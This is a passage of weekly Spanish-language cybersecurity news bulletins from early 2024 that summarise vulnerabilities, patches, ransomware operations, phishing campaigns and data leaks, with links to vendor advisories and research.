Parcheados dos 0-day en Microsoft Microsoft ha lanzado dos parches para solucionar dos vulnerabilidades 0-day en su sistema Windows. La primera vulnerabilidad, denominada CVE-2024-26234 y CVSSv3 de 6.7 según fabricante, permite a los atacantes suplantar controladores de proxy. El archivo malicioso estaba firmado con un certificado válido de Microsoft Hardware Publisher e intentaba hacerse pasar por Thales Group. La segunda vulnerabilidad, conocida como CVE-2024-29988 con CVSSv3 8.8, permite eludir la función de seguridad SmartScreen debido a un fallo en el mecanismo de protección y se ha utilizado activamente en ataques para desplegar malware en sistemas Windows sin ser detectada por las funciones EDR/NDR y la función Mark of the Web (MotW). Además de otras correcciones en sus productos, ha revelado una importante falla en Azure Kubernetes que permite a actores no autenticados tomar el control total de los clústeres. La vulnerabilidad, conocida como CVE-2024-29990 y con una puntuación CVSSv3 de 9.0 según Microsoft, permite a los atacantes robar credenciales y afecta a recursos más allá del ámbito de seguridad gestionado por Azure Kubernetes Service Confidential Containers (AKSCC). https://msrc.microsoft.com/update-guide/releaseNote/2024-Apr Nueva variante de ataques Spectre afecta a procesadores Intel y ARM Los investigadores de VUSec han descubierto una nueva variante del ataque Spectre v2, a la que han denominado Spectre Branch History Injection (BHI). Spectre v2, también conocido como Branch Target Injection (BTI), es una vulnerabilidad que afecta a procesadores y que permitiría a los actores maliciosos filtrar información sensible mediante el abuso de errores de predicción de bifurcaciones. Sin embargo, las mitigaciones provistas para Spectre v2 no protegen de esta nueva variante del fallo, ya que el historial de bifurcaciones global puede ser manipulado desde el espacio del usuario para influir en las predicciones de bifurcaciones. Los investigadores destacan que, aunque mediante ataques BHI un atacante no podría inyectar directamente objetivos de las bifurcaciones, sí tendría la capacidad de manipular el historial global. Spectre BHI parece afectar a múltiples modelos de procesadores Intel y Arm, aunque los procesadores AMD no parecen resultar vulnerables. https://www.vusec.net/projects/bhi-spectre-bhb/ Fortinet corrige vulnerabilidad crítica Fortinet ha lanzado nuevos parches de seguridad para corregir un total de 12 vulnerabilidades que afectan a varios de sus productos FortiOS, FortiProxy, FortiClientMac y FortiSandbox. De entre los fallos de seguridad identificados, destaca el registrado como CVE-2023-45590, CVSSv3 de 9.6 según fabricante, el cual se describe como un problema de inyección de código cuyo aprovechamiento podría permitir a un atacante remoto no autenticado ejecutar código o comandos arbitrarios convenciendo a un usuario de visitar un sitio web malicioso. Dicha vulnerabilidad afecta a las versiones 7.2.0, 7.0.6 a 7.0.10 y 7.0.3 a 7.0.4 de FortiClientLinux, y Fortinet recomienda a sus usuarios actualizar a las versiones 7.2.1 y 7.0.11 para corregir dicho fallo de seguridad. Cabe indicar que por el momento, Fortinet no ha señalado si esta vulnerabilidad se ha explotado activamente, aun así la CISA ha publicado una alerta de seguridad señalando dicho fallo de seguridad, entre otros, que afectan a Fortinet. https://www.cisa.gov/news-events/alerts/2024/04/09/fortinet-releases-security-updates-multiple-products Regreso de Raspberry Robin: nueva campaña de malware se extiende mediante archivos WSF Raspberry Robin, un gusano diseñado para el sistema operativo Windows, presenta la capacidad de descargar y ejecutar cargas adicionales, sirviendo como una plataforma para los actores de amenazas en la distribución de archivos maliciosos. Este malware ha sido empleado para la entrega de varias familias, entre las cuales se incluyen SocGholish, Cobalt, Strike, IcedID, BumbleBee y Truebot, además de ser considerado como un precursor del ransomware. En marzo, el equipo de investigación de amenazas de HP detectó un cambio en la estrategia de propagación empleada por los actores maliciosos que utilizan Raspberry Robin. Ahora el malware se distribuye mediante Archivos de Script de Windows (WSF); el proceso de descarga a través de WSF está altamente ofuscado y emplea múltiples técnicas de análisis que dificultan su detección y ralentizan su análisis. Aunque su método de propagación más conocido involucra unidades USB, los actores de amenazas que utilizan Raspberry Robin están diversificando sus vectores de infección, incluyendo descargas web, con el fin de alcanzar sus objetivos. https://threatresearch.ext.hp.com/raspberry-robin-now-spreading-through-windows-script-files/ Apple alerta a usuarios sobre intentos de compromiso La compañía Apple ha publicado una alerta de seguridad en donde avisa sobre el intento de compromiso de dispositivos móviles de la compañía por parte de actores maliciosos a víctimas que se encuentran en un total de 92 países. En concreto, el aviso de seguridad señala que algunos usuarios estarían siendo objetivo por parte de un spyware como consecuencia de su posición, es decir, actores maliciosos estarían apuntando contra objetivos específicos como periodistas o diplomáticos a nivel global. A raíz de estos hechos, el medio digital BleepingComputer solicitó a Apple más detalles sobre el alcance de la última campaña que han detectado, pero señalan que el portavoz de la compañía se negó a dar aclaraciones. En base a estos hechos, desde Apple han recomendado a sus usuarios una serie de medidas de seguridad como activar el modo de bloqueo, actualizar iPhone a la última versión de software, así como acudir al servicio de ayuda en línea en caso de ser necesario. https://www.documentcloud.org/documents/24539926-threat-notifications-email-april-10 ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
12 de abril de 2024
Boletín de Ciberseguridad, 30 marzo - 5 abril
Vulnerabilidad crítica hallada en XZ apunta a posible ataque contra la cadena de suministro Se ha detectado la vulnerabilidad crítica CVE-2024-3094, CVSSv3 10 según Red Hat, en las versiones 5.6.0 y 5.6.1 de la utilidad de compresión XZ y sus bibliotecas liblzma asociadas. El código malicioso, no presente en los repositorios Git públicos pero encontrado en los tarballs de lanzamiento oficial, fue insertado intencionalmente por un contribuidor del proyecto y representa una amenaza significativa contra sistemas Linux al manipular procesos de autenticación elementales empleados, por ejemplo, en servidores de OpenSSH. El amplio uso de XZ en distribuciones de Linux y sistemas macOS amplifica el impacto potencial, ya que los sistemas que ejecutan versiones comprometidas del software son vulnerables al acceso no autorizado y la ejecución de código remoto si exponen públicamente servidores SSHD. El incidente ha motivado advertencias urgentes de CISA y de varios proveedores como RedHat, aconsejando el retorno a la versión 5.4.6 de XZ que no incluiría la puerta trasera. En paralelo, se están llevando a cabo investigaciones adicionales sobre otras contribuciones realizadas por el desarrollador que introdujo este cambio a otros repositorios de alto impacto. Cyber Security Ataque a la cadena de suministro en Linux: A fuego lento 3 de abril de 2024 Más info Detectada campaña de Venom RAT que apunta a varios sectores de Latinoamérica Recientemente se observó una nueva campaña masiva de phishing, atribuida al actor de amenazas TA558, que ha golpeado a múltiples sectores en Latinoamérica, con el objetivo de distribuir Venom RAT. Según informa Idan Tarab, investigador de Perception Point, la campaña ha afectado a los sectores turismo y ocio, comercial, financiero, manufacturero, industrial y gubernamental en varios países de la región. Se conoce que TA558 ha estado activo desde 2018, y ha utilizado varios tipos de malware como Loda RAT, Vjw0rm y Revenge RAT en ataques anteriores en la región. En esta nueva campaña, la cadena de infección utiliza correos electrónicos de phishing para instalar Venom RAT, una ramificación de Quasar RAT, que permite la recolección de datos sensibles y el control remoto de sistemas. La mayoría de los ataques han sido observados en México, Colombia, Brasil, República Dominicana y Argentina. No obstante, también se han visto afectados países como España, Estados Unidos y Portugal. Más info Informe sobre el incidente de Storm-0558 contra Microsoft El pasado año Microsoft publicó un informe en el que explicó cómo habría mitigado un ataque del actor chino conocido como Storm-0558 y que estaba dirigido a cuentas de correo electrónico de múltiples entidades distintas, entre ellas agencias del gobierno de EE. UU, incluido el Departamento de Estado. Según el informe, el actor de la amenaza explotó un problema de validación de tokens para hacerse pasar por usuarios de Azure AD y obtener acceso al correo corporativo. Sin embargo, recientemente la Junta de Revisión de Seguridad Cibernética (CSRB) del Departamento de Seguridad Nacional de EE. UU. publicó un informe advirtiendo que la compañía debe mejorar la seguridad de los datos y ser más sincera sobre cómo los actores maliciosos robaron la clave de firma, ya que dicha institución afirma que no hay ninguna evidencia definitiva sobre cómo el actor de amenazas obtuvo la clave de firma. No obstante, señalan que podría haberse producido debido a una concatenación de fallos de seguridad en Microsoft. Desde la CSRB destacan que el agente amenaza habría obtenido unos 60 000 correos únicamente pertenecientes al Departamento de Estado. Más info CONTINUATION Flood permite ataques DoS con solo una conexión TCP Las vulnerabilidades recientemente descubiertas, denominadas CONTINUATION Flood, que afectan al protocolo HTTP/2 pueden llevar a ataques de Denegación de Servicio (DoS) mediante una única conexión TCP. De acuerdo con el investigador Barket Nowotarski, este fallo se debería a la omisión de frame checks en mensajes HTTP/2, permitiendo a los atacantes mandar una cadena de frames sin la flag “END_HEADERS” y con una longitud tal que causaría interrupciones en el servidor. Asimismo, se destaca que estos ataques DoS podrían ocurrir debido a una falta de memoria o un agotamiento de recursos de la CPU causado por el procesamiento de estos frames, cuyo tamaño no estaría limitado debido al uso de frames de tipo “CONTINUATION”. Algunas de las vulnerabilidades detectadas hasta el momento relacionadas con CONTINUATION Flood incluyen CVE-2024-27983, CVE-2024-27919 (CVSSv3 7.5 según GitHub), CVE-2024-2758 y CVE-2024-2653. Más info Darcula: análisis de plataforma de Phishing as a Service El equipo de investigadores de Netcraft ha realizado una publicación en la que analizan el servicio de Phishing as a Service denominado Darcula. En concreto, los investigadores señalan que dicha plataforma emplearía más de 20 000 dominios en 11 000 direcciones IP para falsificar a más de 200 marcas con el objetivo de engañar a usuarios tanto de dispositivos Android como iPhone de más de 100 países. Según los expertos, Darcula destaca por emplear JavaScript, React, Docker y Harbour, lo que permite actualizaciones continuas y nuevas funciones sin necesidad de reinstalar kits de phishing. Asimismo, Darcula no utiliza la clásica remisión de mensajes SMS, en su lugar utiliza RCS (Android) e iMessage (iOS) para enviar mensajes a las víctimas con enlaces a las URL de phishing. Netcraft además señala que los TLD más comunes son .top y .com, seguidos de otros TLD de bajo coste, y recomiendan sospechar de todos los mensajes entrantes que insten a acceder a URL, especialmente si no se reconoce al remitente. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
5 de abril de 2024
Boletín de Ciberseguridad, 9 - 15 marzo
Dos vulnerabilidades críticas en el Security Patch Day de Microsoft Microsoft ha lanzado actualizaciones en el Patch Tuesday de marzo, corrigiendo varias vulnerabilidades en su software, incluyendo Windows, Office, Azure, .NET Framework, SQL Server, Skype, y Microsoft Dynamics. Dos de estas vulnerabilidades son consideradas críticas, mientras que las demás son clasificadas de gravedad alta. Una de las vulnerabilidades, CVE-2024-21407 CVSSv3 8.1 según proveedor, permite la ejecución remota de código en Windows Hyper-V, mientras que la otra, CVE-2024-21408 CVSSv3 5.5 según fabricante, provoca una denegación de servicio en la misma plataforma. La vulnerabilidad más grave, CVE-2024-21334 CVSSv3 9.8 según Microsoft, es una vulnerabilidad de ejecución remota de código en Open Management Infrastructure (OMI), que permite a un atacante no autenticado ejecutar código en instancias de OMI accesibles a través de Internet. Además, Microsoft también abordó una vulnerabilidad crítica de elevación de privilegios en Microsoft Azure Kubernetes, CVE-2024-21400 CVSSv3 9.0 según fabricante. Más info Detectada campaña de phishing distribuyendo VCURMS y STRRAT Una nueva campaña de phishing está distribuyendo dos troyanos de acceso remoto (RAT) denominados como VCURMS y STRRAT. La campaña, identificada por FortiGuard Labs, utiliza un descargador malicioso basado en Java, almacenando los mencionados software maliciosos en servicios públicos como AWS y GitHub para evitar la detección. VCURMS utiliza una dirección de correo electrónico de Proton Mail para comunicarse con un servidor C2. La cadena de ataque comienza con un correo electrónico de phishing que lleva a la descarga de un archivo JAR malicioso alojado en AWS. Este archivo JAR luego descarga dos archivos más que ejecutan los troyanos. Además, envía correos electrónicos periódicamente al servidor controlado por el atacante y puede ejecutar comandos arbitrarios, recopilar información del sistema y robar datos de aplicaciones como Discord y Steam, credenciales de navegadores, capturas de pantalla, entre otros. En cuanto a STRRAT, este fue observado por primera vez desde 2020, también se propaga a través de archivos JAR fraudulentos y tiene capacidades similares a VCURMS. Esta campaña se dirige principalmente a plataformas con Java instalado, lo que representa un riesgo para cualquier organización que lo utilice. Más info PoC disponible para una vulnerabilidad en OpenEdge de Progress Software El equipo de Progress Software ha publicado los detalles técnicos acerca de una vulnerabilidad crítica en Progress Software OpenEdge Authentication Gateway y Adminserver. La vulnerabilidad, identificada como CVE-2024-1403 y CVSS de 10.0, afecta a las versiones del software anteriores a 11.7.19, 12.2.14, 12.8.1 y es un fallo de omisión de autenticación, lo que puede derivar en un acceso no autorizado. El fallo ha quedado solucionado en las versiones OpenEdge LTS Update 11.7.19, 12.2.14 y 12.8.1. Cabe destacar su criticidad, debido a que pese a la categorización de la misma, se ha lanzado una PoC, la cual indica que el origen de la vulnerabilidad se encuentra en la función connect() del activo afectado. Más info Detectado el uso de Dropbox como medio de ataques de phishing Los investigadores de Darktrace han identificado un ataque en el que el actor de amenazas empleaba el servicio Dropbox para llevar a cabo ataques de phishing. En concreto, en este ataque varios empleados de una empresa recibieron un email proveniente de una dirección legítima de Dropbox que incluía un link, el cual llevaba a un archivo PDF que había sido nombrado como un socio de la empresa. Asimismo, dicho PDF contenía un link a un dominio malicioso que se hacía pasar por una página de login de Microsoft, probablemente con el objetivo de robar las credenciales que el usuario introdujera en ella. Darktrace destaca que uno de los empleados que recibió este email accedió al dominio de phishing e introdujo sus credenciales, tras lo cual el actor de amenazas obtuvo un token MFA válido de esa cuenta y comenzó a llevar a cabo ataques de phishing contra otros empleados de la empresa mediante el email de la cuenta de Microsoft comprometida. Más info CISA afectada por incidente de seguridad La Agencia de Seguridad de Infraestructura y Ciberseguridad (CISA) ha comunicado a varios medios digitales que durante el mes de febrero se vieron afectados por un incidente de seguridad. En concreto, la CISA señaló que identificaron actividad maliciosa que explotaron fallos de seguridad que afectaban a dos sistemas de Ivanti que utiliza la agencia. A raíz de estos hechos, decidieron tomar la decisión de desconectar dichos activos para paliar el compromiso. Según comunicaron fuentes internas a Recorded Future News estos activos fueron Infrastructure Protection (IP) Gateway y the Chemical Security Assessment Tool (CSAT). Cabe indicar que se desconoce si se ha accedido a los datos y exfiltrado la información, aunque la CISA comunicó a TechTarget que estos hechos no han ocasionado impacto operativo en el momento de informarles sobre la situación. En último lugar, la organización remite como recomendación a seguir la información proporcionada en un aviso de seguridad publicado el pasado 29 de febrero sobre las vulnerabilidades de Ivanti. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros → Cyber Security SASE es la solución integral para maximizar la seguridad empresarial 20 de febrero de 2024
15 de marzo de 2024
Boletín de Ciberseguridad, 2 - 8 marzo
Expuestos códigos 2FA de Meta, Google y TikTok Recientemente se informó acerca de que una base de datos expuesta de la empresa asiática YX International reveló códigos de seguridad únicos para cuentas de Facebook, Google y TikTok, entre otros. La base de datos, sin contraseña, permitía el acceso a datos confidenciales usando solo un navegador web e introduciendo la dirección IP pública. El investigador de seguridad Anurag Sen descubrió la filtración y compartió los detalles con TechCrunch. Al parecer, la base de datos contenía registros mensuales que se remontaban a julio de 2023, incluyendo mensajes SMS con códigos de acceso y enlaces de restablecimiento de contraseña. Por su parte, TechCrunch notificó a YX International de la la filtración, quien la solucionó protegiendo el acceso. Aunque YX International afirmó que el servidor no almacenaba registros de acceso, no revelaron por cuánto tiempo estuvo expuesta la base de datos. Asimismo, las empresas afectadas, como Meta, Google y TikTok, no han realizado ningún comentario sobre el incidente. Más info Parcheadas dos vulnerabilidades 0-day en Apple Apple ha publicado actualizaciones de seguridad de emergencia para abordar dos vulnerabilidades 0-day en iOS, que han sido activamente explotadas. Las vulnerabilidades, denominadas como CVE-2024-23225 y CVE-2024-23296, afectan a varios modelos de iPhone y iPad. La primera vulnerabilidad es un fallo de corrupción de memoria del kernel, mientras que la segunda es un fallo de corrupción de memoria de RTKit. Se recomienda a los usuarios actualizar sus dispositivos a las versiones de iOS 17.4, iPadOS 17.4, iOS 16.76 y iPad 16.7.6. Además, Apple ha solucionado un problema de privacidad relacionado con los datos sensibles de localización, CVE-2024-23243, y un problema en la navegación privada de Safari, CVE-2024-23256. Más info La APT Kimsuky explota vulnerabilidades de ScreenConnect para desplegar malware El grupo norcoreano Kimsuky está explotando las vulnerabilidades de ScreenConnect recientemente parcheadas CVE-2024-1708 y CVE-2024-1709, con CVSSv3 de 8.4 y 10 respectivamente, para desplegar el malware ToddleShark. De acuerdo con Vulnera, esta APT (Amenaza Avanzada Persistente), también denominada Thallium y Velvet Chollima, estaría empleando este nuevo malware de características polimórficas con objetivos de espionaje. En concreto, ToddleShark parece ser una variante de otros backdoors empleados por el grupo, como BabyShark y ReconShark, y tiene la capacidad de obtener persistencia mediante tareas programadas, evitar ser detectado mediante el uso de binarios de Microsoft y reducir las defensas del sistema comprometido al modificar el registro. Asimismo, ToddleShark codifica la información obtenida en certificados Privacy Enchanced Mail (PEM) y la exfiltra a la infraestructura de C2 de Kimsuky. Más info Polémica sobre la incautación del sitio web de BlackCat (ALPHV) El sitio web de la banda de ransomware BlackCat (ALPHV) ha sido incautado de nuevo, aparentemente con la colaboración de las fuerzas de seguridad. Sin embargo, algunos expertos creen que ALPHV ha utilizado un banner de una incautación anterior y orquestado un falso desmantelamiento para distraer la atención mientras huye con los fondos generados por sus afiliados. En febrero de 2024, la empresa de tecnología sanitaria Change Healthcare sufrió un ataque y pagó un rescate de 22 millones de dólares, poco después las cuentas de afiliados a ALPHV fueron bloqueadas y el actor amenaza puso a la venta el código fuente del ransomware. Días después aparece el banner de incautación en su web, suscitando dudas sobre la autenticidad de la incautación. De hecho, según Recorded Future, tanto el Departamento de Justicia de Estados Unidos como la Agencia Nacional del Crimen de Reino Unido y la Europol han negado haber clausurado la infraestructura de ALPHV. Más info Vulnerabilidad de TeamCity explotada activamente Recientemente, JetBrains informó acerca de dos vulnerabilidades de alta criticidad en su producto TeamCity que fueron identificados como CVE-2024-27198 y CVE-2024-27199, CVSSv3 de 9.8 y 7.3 según fabricante respectivamente. Sin embargo, una vez que se hicieron públicos, actores maliciosos han comenzado a explotar la vulnerabilidad CVE-2024-27198 para realizar operaciones contra aquellos activos vulnerables. En concreto, investigadores de seguridad han alertado que por una parte se estarían realizando distribuciones del ransomware Jasmin, así como, se están creando cientos de nuevos usuarios en instancias sin parches. Según el motor de búsqueda de vulnerabilidades LeakIX estiman que mas de 1 700 servidores de TeamCity, principalmente geolocalizados en Alemania, EE. UU. y Rusia, no habrían sido parcheados y que, de estos, 1 440 habrían sido comprometidos. Desde JetBrains recomiendan a sus usuarios actualizar a la última versión para corregir los fallos de seguridad. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros → Cyber Security 'Living off the land': cómo los atacantes emplean tus propias herramientas en su provecho 28 de febrero de 2024
8 de marzo de 2024
Boletín de Ciberseguridad, 24 febrero - 1 marzo
CISA advierte sobre vulnerabilidades en Ivanti La Agencia de Seguridad de Infraestructura y Ciberseguridad (CISA) ha emitido un aviso de seguridad en la que advierte que actores maliciosos pueden mantener la persistencia en dispositivos con Ivanti Connect Secure e Ivanti Policy Secure previamente comprometidos pese a haber aplicado las recomendaciones de seguridad. Según los investigadores, aquellos actores maliciosos que aprovechasen alguna de las vulnerabilidades publicadas durante las últimas semanas, CVE-2023-46805, CVSSv3 de 8.2, CVE-2024-21887, CVSSv3 de 9.1, CVE-2024-22024, CVSSv3 de 8.3 y CVE-2024-21893, CVSSv3 de 8.2, podrían no haber sido identificados por las herramientas de análisis proporcionadas, Ivanti ICT, para detectar el compromiso, por lo que un actor amenaza puede obtener persistencia a pesar de realizar restablecimientos de fábrica. Pese a esta alerta, desde Ivanti han lanzado un comunicado indicando que no tienen conocimiento de ningún caso de persistencia obtenida por ningún actor malicioso después de la implementación de las actualizaciones de seguridad y restablecimientos de fábrica recomendados por el fabricante. Más info Nueva información sobre la infraestructura de ransomware LockBit Durante el pasado fin de semana, los operadores del ransomware LockBit han anunciado la reanudación de las operaciones de esta amenaza. Dichos actores maliciosos han trasladado su sitio de filtraciones a una nueva dirección .onion en la que aparecen nuevas víctimas y un comunicado informando sobre los hechos ocurridos durante la operación Cronos. No obstante, también se ha publicado recientemente por parte de las autoridades información sobre Lockbitsupp, quien sería la persona detrás de la gestión de las operaciones de dicha ransomware. En concreto, las autoridades señalaron que saben quién es y dónde vive, así como que estaría colaborando con las autoridades. Desde VX-Underground señalan que desde el grupo no creían que esto fuese cierto. En último lugar, cabe indicar que según el análisis de cientos de carteras de criptomonedas realizadas por expertos calculan que durante los últimos 18 meses las operaciones llevadas a cabo por LockBit habrían generado movimientos por valor de más de 125 millones de dólares, aunque las autoridades señalan que la cifra sería más debido a que sus operaciones llevan activas durante 4 años. Más info Parcheada vulnerabilidad en el restablecimiento de contraseña de Facebook Meta ha solucionado una vulnerabilidad crítica en el proceso de restablecimiento de contraseña de Facebook. El fallo permitía a los atacantes tomar el control de cualquier cuenta de Facebook explotando una opción en la que se enviaba un código único de autorización de seis dígitos a un dispositivo diferente. Este código, que confirmaba la identidad del usuario, estaba activo durante aproximadamente dos horas y no contaba con protección contra ataques de fuerza bruta. Los atacantes podrían utilizar herramientas de pentesting para forzar el código y restablecer la contraseña o acceder a la cuenta atacada. Al explotar esta vulnerabilidad, el usuario recibía una notificación de Facebook que revelaba el código o solicitaba al usuario que tocara la notificación para verlo, convirtiéndolo en un exploit one-click en lugar de zero-click. Más info Ciberataque al Consorcio Regional de Transportes de Madrid El Consorcio Regional de Transportes de Madrid ha admitido que fue víctima de un ciberataque en noviembre del 2023. El ataque tuvo como resultado el compromiso de las bases de datos que contenían información sobre los titulares de la Tarjeta Transporte Público. Se desconoce el contenido exacto de la información extraída, pero incluye datos personales como nombres, dirección postal, direcciones de correo electrónico y números de teléfono. El ataque fue neutralizado el mismo día en que se produjo y se tomaron las medidas necesarias para bloquear el ataque, aplicando medidas de seguridad adicionales. Aunque no hay constancia de daños reales a las personas afectadas, existe el riesgo de recibir comunicaciones no deseadas o ser víctima de campañas de phishing. Más info Expuestos registros LDAP de la Junta de Andalucía El usuario fpa del sitio BreachForums realizó un post en el que publicaba acerca de haber exfiltrado más de 3000 registros de usuarios LDAP de la Junta de Andalucía, entidad encargada de gestionar el autogobierno de la región autónoma de Andalucía en España. Este tipo de directorios LDAP son utilizados comúnmente para almacenar información de usuarios, grupos, dispositivos de red y otros recursos en una red informática. Al parecer, el archivo publicado contiene direcciones de correo electrónico, nombres de usuario y hashes. La publicación fue realizada recientemente y no ofrece mayores detalles acerca del método de obtención de estos datos. No obstante, cabe destacar que el actor amenaza en cuestión es el mismo que publicó la base de datos del sindicato Comisiones Obreras (CC OO). Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros → Cyber Security Ciberseguridad y el golpe de los 10.000 millones de dólares 10 de enero de 2024
29 de febrero de 2024
Boletín de Ciberseguridad, 17 - 23 de febrero
Desmantelada la infraestructura del ransomware LockBit La Agencia Nacional contra el Crimen del Reino Unido (NCA), en colaboración con agencias policiales de otros 10 países entre las que se encuentra el FBI, han interrumpido la infraestructura y servicios de los operadores del ransomware LockBit. Los hechos tuvieron lugar el lunes 19 de febrero, momento en que el sitio web de LockBit comenzó a mostrar un banner indicando que las agencias anteriores habían logrado desarticular la infraestructura de esta amenaza. Según Cyberscoop, el FBI ha obtenido acceso a casi 1.000 claves de descifrado, lo que permitiría la posible recuperación o remediación de las operaciones de extorsión de LockBit que se encuentran en curso. Los gestores de LockBit han identificado que habrían sido comprometidos debido a la explotación de la vulnerabilidad de PHP registrada como CVE-2023-3824, CVSSv3 de 9.8. Más info Servicio de AWS utilizado para campañas de smishing Investigadores de seguridad de SentinelOne han descubierto un script Python malicioso, al que han apodado como SNS Sender, el cual se anuncia como una forma para que los actores amenaza envíen mensajes masivos de smishing aprovechando el Servicio de Notificación Simple (SNS) de Amazon Web Services (AWS). Estos mensajes están diseñados para propagar enlaces maliciosos que capturan información de identificación personal y detalles de tarjetas de crédito. SNS Sender es también la primera herramienta observada en la naturaleza que aprovecha AWS para llevar a cabo ataques de spam mediante mensajes SMS y, según los investigadores, existen evidencias que sugieren que esta operación puede haber estado activa al menos desde julio de 2022. Más info Análisis del ransomware Alpha muestra similitudes con NetWalker El ransomware Alpha, descubierto recientemente, tiene similitudes con el Ransomware-as-a-Service NetWalker, que dejó de operar en 2021. De acuerdo con un análisis publicado por Netenrich, Alpha añade una extensión de ocho números aleatorios a los archivos cifrados y ha cambiado el contenido de la nota de rescate en varias ocasiones, incluyendo actualmente un TOX ID para contactar con los operadores del ransomware. Por otro lado, los investigadores de Symantec Threat Hunter Team afirman que, debido a la similitud de las herramientas, tácticas, técnicas y procedimientos entre ambos, es posible que NetWalker y Alpha estén relacionados ya que han observado que ambos emplean un loader basado en Power-Shell para desplegar sus cargas útiles, sus códigos se solapan y sus portales de pago emplean el mismo mensaje, entre otras similitudes. Más info Detectada campaña de Anatsa que apunta a Europa El troyano bancario Anatsa ha afectado a usuarios de Europa, infectando dispositivos Android a través de aplicaciones maliciosas en Google Play, en una nueva campaña observada desde noviembre de 2023. Investigadores de ThreatFabric observaron cinco oleadas distintas de esta campaña en las que se distribuyó el malware en Reino Unido, Alemania, España, Eslovaquia, Eslovenia y Chequia, con 150.000 infecciones. Anatsa, también conocido como TeaBot y Toddler, se distribuye a través de droppers que se hacen pasar por aplicaciones aparentemente inofensivas en Google Play Store, explotando con éxito el servicio de accesibilidad, y eludiendo la configuración restringida de Android 13. Más info Parcheada una vulnerabilidad de severidad alta en Shortcuts de Apple Los investigadores de Bitdefender han descubierto una nueva vulnerabilidad que afecta a la aplicación Shortcuts de Apple, y que permitiría a un atacante acceder y usar datos sensibles sin requerir interacción con el usuario. El fallo registrado como CVE-2023-23204, CVSSv3 de 7.5 y tiene su origen en la acción shortcut Expand URL, que permite expandir y limpiar URLs que han sido acortadas, a la vez que elimina los parámetros de seguimiento UTM. Un actor amenaza podría emplear esta vulnerabilidad para transmitir los datos codificados en base64 de un dato sensible seleccionado dentro de Shortcuts a un servidor web malicioso. Asimismo, los datos ya filtrados pueden ser capturados y guardados en formato imagen con utilidades como Flask. El fallo ya ha sido reportado a Apple, empresa que publicó los parches necesarios el 22 de enero en las siguientes versiones de sus productos: iOS 17.3, iPadOS 17.3, macOS Sonoma 14.3 y watchOS 10.3. Más info Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
23 de febrero de 2024
Boletín de Ciberseguridad, 10 - 16 de febrero
Campaña de secuestro de cuentas de Microsoft Azure Proofpoint ha publicado un análisis acerca de una nueva campaña en la que un grupo de ciberdelincuentes distribuye correos electrónicos de phishing a empleados para obtener acceso a sus cuentas de Microsoft Azure y Office 365. A través de esos correos, redirigen a las víctimas a un falso inicio de sesión de Microsoft. En cuanto a las actividades post-explotación, utilizan una cadena de agente de usuario específica para acceder a varias aplicaciones de Microsoft 365, como Exchange Online, My Signins, My Apps y My Profile, además de emplear proxies o servicios de alojamiento de datos para ocultar su infraestructura operativa. Cabe destacar que se dirigen especialmente contra empleados que tienen más privilegios dentro de sus organizaciones, como directores, gerentes y ejecutivos. Proofpoint recomienda varias medidas como monitorear el uso de la cadena de agente de usuario y los dominios de origen, restablecer las contraseñas vulneradas, usar herramientas de seguridad para detectar eventos o aplicar mitigaciones estándar contra el phishing. Más info Microsoft parchea dos 0-day explotadas activamente Microsoft ha lanzado nuevas actualizaciones en el contexto del Patch Tuesday de febrero parcheando un total de 73 vulnerabilidades, 30 de las cuales permitirían a un atacante ejecutar código remoto. Entre los fallos corregidos, destacan dos 0-day activamente explotadas: CVE-2024-21351 y CVE-2024-21412, ambas de severidad alta según Microsoft. La primera de estas permitiría a un actor amenaza sobrepasar los controles de seguridad de Windows SmartScreen. Sin embargo, para poder ser explotada, un atacante autorizado tendría que previamente convencer al usuario de que abriese un archivo malicioso. Microsoft no ha detallado cómo o por qué actor amenaza ha sido explotada esta vulnerabilidad. Por otro lado, CVE-2024-21412 afecta a Internet Shortcut File y permitiría a un atacante no autenticado enviar un archivo al usuario que le permita sobrepasar los controles de seguridad de Mark of the Web (MoTW). Asimismo, de acuerdo con Trend Micro este fallo ha sido explotado por el actor amenaza Water Hydra para desplegar el Troyano de Acceso Remoto (RAT) DarkMe. Más info El ransomware JKwerlo dirige sus ataques a usuarios españoles y franceses Los investigadores de Cyble Research & Intelligence Labs (CRIL) han descubierto un nuevo ransomware escrito en Go al que han denominado JKwerlo y cuyos ataques van dirigidos a usuarios hispanohablantes y francófonos. El acceso inicial parece obtenerse mediante emails de phishing de carácter supuestamente legal con archivos HTML adjuntos y con archivos ZIP incorporados que, o bien despliegan directamente la carga útil del ransomware, como ocurre con los emails en español, o bien inician una serie de eventos que finalizan con el despliegue de este, caso observado en los emails en francés. En la campaña en francés, se observó el uso de scripts PowerShell para descargar y ejecutar otros archivos de Dropbox, ejecutando finalmente otro script de PowerShell que despliega JKwerlo. Asimismo, este ransomware usa PsExec y Rubeus para moverse lateralmente por la red, eliminando Resmon.exe y Tasmgr.exe en el proceso con el objetivo de no ser monitorizado. Más info #MonikerLink bug, una vulnerabilidad RCE en Outlook Un investigador de Check Point ha descubierto un fallo de seguridad en Outlook que permite el acceso remoto a recursos y la ejecución de código mediante el uso de un enlace malicioso. El problema se debe al uso de una API insegura (MkParseDisplayName) que trata el enlace como un Moniker Link, una forma de buscar objetos COM en Windows, el cual puede invocar aplicaciones como Word o Excel como servidores COM y explotar sus vulnerabilidades. Cabe destacar que el fallo no solo se da en Outlook, sino también en otros programas que utilicen la API, tratándose de un riesgo similar a Log4Shell. La vulnerabilidad, que cuenta con un PoC, se ha identificado como CVE-2024-21413, CVSS de 9.8 y afecta a las últimas versiones de Windows y Office. Más info El troyano GoldPickaxe para iOS roba datos biométricos El grupo de ciberseguridad Group-IB ha descubierto un nuevo troyano para iOS 